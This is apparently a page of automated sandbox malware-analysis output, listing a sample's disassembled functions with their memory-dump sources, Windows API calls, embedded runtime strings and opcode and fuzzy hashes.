                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1063f94a2ee9f1fee08427603c53f1cfd372c91f74bd05c1344c5bda07989971
                                                                                                        • Instruction ID: 7949ddfb39071379304a9a8cffaf45b7412013d94ebbfa0f8a0e12d2f5b97eeb
                                                                                                        • Opcode Fuzzy Hash: 1063f94a2ee9f1fee08427603c53f1cfd372c91f74bd05c1344c5bda07989971
                                                                                                        • Instruction Fuzzy Hash: 2D516162A08B9189F731EF75E4857E9A7A0FB443A8F544134EE8D06B86EF3C9185C361
                                                                                                        Function 00007FF79E94F377 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 128COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID: program path has no file name$0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character
                                                                                                        • API String ID: 2962429428-4245703473
                                                                                                        • Opcode ID: d39e47c7ca5cfe49d835826f7d66da12ddafedc23023e4875b4d0dc30d09e57b
                                                                                                        • Instruction ID: 2b3238afa66e2e91e2405cc510e39994b06381488959322f0b9e9554f9e91c4a
                                                                                                        • Opcode Fuzzy Hash: d39e47c7ca5cfe49d835826f7d66da12ddafedc23023e4875b4d0dc30d09e57b
                                                                                                        • Instruction Fuzzy Hash: 3251A562A0899255EF70BA3198843FE9390FF46BA8F841432DE0D47796EE3CE5418332
                                                                                                        Function 00007FF79E927940 Relevance: 9.1, APIs: 6, Instructions: 92timesleepsynchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2261246915-0
                                                                                                        • Opcode ID: b5f4cb35f05886f4d31e4aca8b03a729eb61a9f354374a2d77c1c0ae741c7c36
                                                                                                        • Instruction ID: 366b04e9e25fc7f8b42ca68774a084884a53d67b7d65f5b9f4a0432dcb2f713a
                                                                                                        • Opcode Fuzzy Hash: b5f4cb35f05886f4d31e4aca8b03a729eb61a9f354374a2d77c1c0ae741c7c36
                                                                                                        • Instruction Fuzzy Hash: CF217822F0961216FF7CB6762962334C24A1F847B0F899235FD1E667D5DC3CA6008632
                                                                                                        Function 00007FF79E9476B0 Relevance: 9.1, APIs: 6, Instructions: 68networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$HandleInformationSocketclosesocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 1159780279-0
                                                                                                        • Opcode ID: 89236558c6572c69d8797d5ee2b66b3e15e28f56c0e71b4a2d265fc120f2cf61
                                                                                                        • Instruction ID: 25b39adbeb1f5f8ce83d82125f75189f84b8897bebebef05d602cac67e3e5079
                                                                                                        • Opcode Fuzzy Hash: 89236558c6572c69d8797d5ee2b66b3e15e28f56c0e71b4a2d265fc120f2cf61
                                                                                                        • Instruction Fuzzy Hash: 4011E131F0816506F7307A79D485B669681AB843F8F984330EE6C57BC6ED7D99824B31
                                                                                                        Function 00007FF79E969672 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • TPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL, xrefs: 00007FF79E9696E5
                                                                                                        • R8_F, xrefs: 00007FF79E9696AD
                                                                                                        • R8_U, xrefs: 00007FF79E969672
                                                                                                        • R9_F, xrefs: 00007FF79E9696C9
                                                                                                        • R9_U, xrefs: 00007FF79E969691
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp
                                                                                                        • String ID: R8_F$R8_U$R9_F$R9_U$TPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL
                                                                                                        • API String ID: 1475443563-1802361725
                                                                                                        • Opcode ID: 337bd77bac466ef6af75d31728e79a359992667c230a7dcc0bfcfa1e8b9874c2
                                                                                                        • Instruction ID: 0ec58a1a7bf682249fddb34e893f0ebabc9a47387c9da7293dc24ede452e8d5e
                                                                                                        • Opcode Fuzzy Hash: 337bd77bac466ef6af75d31728e79a359992667c230a7dcc0bfcfa1e8b9874c2
                                                                                                        • Instruction Fuzzy Hash: 1611E923E1887647F7709A3CA480B7697D1DF05FA5F946031C94D8B6E0DA3EE4419AB1
                                                                                                        Function 00007FF79E927AC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 175COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF79E927BCF, 00007FF79E927D19
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$AddressErrorLastWait
                                                                                                        • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
                                                                                                        • API String ID: 1881407604-63010627
                                                                                                        • Opcode ID: c63a79c920b23dd25f0e73757991695bfd17002a75ce36b5631c1c8cc01a7c61
                                                                                                        • Instruction ID: bac86f851fb2915290c8f6ec141bd46d180d8bd6cc1028af25c4521aa887f29e
                                                                                                        • Opcode Fuzzy Hash: c63a79c920b23dd25f0e73757991695bfd17002a75ce36b5631c1c8cc01a7c61
                                                                                                        • Instruction Fuzzy Hash: 54510422F19A8259FF35BB70D8812BDA764AB40764FD44136DE0D27BD5DE2CA542C331
                                                                                                        Function 00007FF79E93F310 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 498COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: PATHlibrary\std\src\sys_common\process.rs$assertion failed: self.height > 0
                                                                                                        • API String ID: 3510742995-3507162100
                                                                                                        • Opcode ID: a087237bcf938bba385ece63445749f83ecff70f4101cd1bdba2c2cdc9de05ae
                                                                                                        • Instruction ID: f805cb29257fe04f1eb38248ebd291bc5512e8a1b1e14469def3395d9dc8e3e9
                                                                                                        • Opcode Fuzzy Hash: a087237bcf938bba385ece63445749f83ecff70f4101cd1bdba2c2cdc9de05ae
                                                                                                        • Instruction Fuzzy Hash: 9132C722A08BC184E732AF35D8853F8A360FF55BA8F545131DE4D17B96DF399296C320
                                                                                                        Function 00007FF79E913A70 Relevance: 7.9, APIs: 2, Strings: 3, Instructions: 364COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • assertion failed: old_left_len >= count, xrefs: 00007FF79E914C1A
                                                                                                        • 0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character, xrefs: 00007FF79E913A71
                                                                                                        • assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FF79E915E73
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: 0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character$assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: old_left_len >= count
                                                                                                        • API String ID: 3510742995-2606162457
                                                                                                        • Opcode ID: 4930317a2fd92120e4bc59f8b9b2d04c06098b35c20cfe02a10b2916d063e656
                                                                                                        • Instruction ID: 8658a0a7dd65c9d7489e4b622f26b37ad256199844143437f0b72a892a9fc47e
                                                                                                        • Opcode Fuzzy Hash: 4930317a2fd92120e4bc59f8b9b2d04c06098b35c20cfe02a10b2916d063e656
                                                                                                        • Instruction Fuzzy Hash: B9E1C062B09B8186EB65EF25D8803BDA3B0FB54BA4F858531DE1D17792DF38E591C320
                                                                                                        Function 00007FF79E953550 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 267COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: program path has no file name$0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character
                                                                                                        • API String ID: 3510742995-4245703473
                                                                                                        • Opcode ID: 5c48e4c39586f8f585aba54d1f6d3e192b2042a8855fe34e5db6de5f69e32e97
                                                                                                        • Instruction ID: ad78235e03fa6b027e5daeab4d0b1b35c62c6fb759a6bc32f8bfc1ba8101e7fe
                                                                                                        • Opcode Fuzzy Hash: 5c48e4c39586f8f585aba54d1f6d3e192b2042a8855fe34e5db6de5f69e32e97
                                                                                                        • Instruction Fuzzy Hash: 41A1F662F1875185EA20EB3189816BDA761BB04BE8F848535DE0D17B9ADF7CE1418332
                                                                                                        Function 00007FF79E9154E0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 157COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY$assertion failed: old_left_len + count <= CAPACITY
                                                                                                        • API String ID: 3510742995-3535459961
                                                                                                        • Opcode ID: 70168d065c6a3ca59545dac05477e4dd7e94a6eca155fb99468ba8c209af9471
                                                                                                        • Instruction ID: 0ad851e3c091575c9002233448e764cfb2fc126dcbe1c91d1181907e88bef693
                                                                                                        • Opcode Fuzzy Hash: 70168d065c6a3ca59545dac05477e4dd7e94a6eca155fb99468ba8c209af9471
                                                                                                        • Instruction Fuzzy Hash: 78815D32A04BC589E725DF39E8803ED73A4FB58798F918225DE8C17669EF35D295C320
                                                                                                        Function 00007FF79E94F3A5 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 125COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID: program path has no file name$0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character
                                                                                                        • API String ID: 2962429428-4245703473
                                                                                                        • Opcode ID: 0221059959927185e1ee47e6ab362134e2310c63e78cffffa04ba2c42ea86f24
                                                                                                        • Instruction ID: fe6583bace83eac87595de5d81d02373475190584bd51305e3e01a296ea11015
                                                                                                        • Opcode Fuzzy Hash: 0221059959927185e1ee47e6ab362134e2310c63e78cffffa04ba2c42ea86f24
                                                                                                        • Instruction Fuzzy Hash: 0641A662A0899255EF70BA31D8847FA9390FF56BA8F845432DE0D47796EF3CE5418332
                                                                                                        Function 00007FF79E947830 Relevance: 7.6, APIs: 5, Instructions: 93networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$connectioctlsocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 1971785428-0
                                                                                                        • Opcode ID: 0db338ea5928d33d7f0d60137e2a4ec9b44759f720c3e057481c14978456a539
                                                                                                        • Instruction ID: 9c330c34411d0ba063ef6413b6a7d06eea27f2b1bb1556bddaf6f56785eb62b4
                                                                                                        • Opcode Fuzzy Hash: 0db338ea5928d33d7f0d60137e2a4ec9b44759f720c3e057481c14978456a539
                                                                                                        • Instruction Fuzzy Hash: 7A312122A182E585E330AB7088C17F9B7A5EB443A8F915232DE1C473C0EF38E585C372
                                                                                                        Function 00007FF79E94FB8B Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorHandleLast$CurrentDuplicateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 3697983210-0
                                                                                                        • Opcode ID: e16d268964d62feb434ca1289034d1693678657d648a729bbab490d3768ff12e
                                                                                                        • Instruction ID: d3f361219709484f353793939b04c86afe43631722daa626da80c989b85ada28
                                                                                                        • Opcode Fuzzy Hash: e16d268964d62feb434ca1289034d1693678657d648a729bbab490d3768ff12e
                                                                                                        • Instruction Fuzzy Hash: 9E115222E0932245FB30FAB0A4853B9A790AB497B8F941235DD5C57BC6EF7CD4818772
                                                                                                        Function 00007FF79E99D980 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 240memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualProtect.KERNEL32(00007FF79EACA1B0,00007FF79EACA1B8,00000001,?,?,?,?,?,00007FF79E8F1224,?,?,?,00007FF79E8F13E6), ref: 00007FF79E99DB5D
                                                                                                        Strings
                                                                                                        • Unknown pseudo relocation bit size %d., xrefs: 00007FF79E99DCB4
                                                                                                        • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF79E99DCCA
                                                                                                        • Unknown pseudo relocation protocol version %d., xrefs: 00007FF79E99DCD6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                        • API String ID: 544645111-1286557213
                                                                                                        • Opcode ID: 96b70dcdced3092a79e7ce9b1dbf8396ced5d4e9346ba3b35ff7dc70d908fabe
                                                                                                        • Instruction ID: 5e2f879e50f04784a605097928111cf205aff8f24755bb468206d7e37ceda9a8
                                                                                                        • Opcode Fuzzy Hash: 96b70dcdced3092a79e7ce9b1dbf8396ced5d4e9346ba3b35ff7dc70d908fabe
                                                                                                        • Instruction Fuzzy Hash: A991A332E1D5128AFA307B3599C0779E359EF95774F948231DA2D177E8EE2CE8418232
                                                                                                        Function 00007FF79E94F837 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
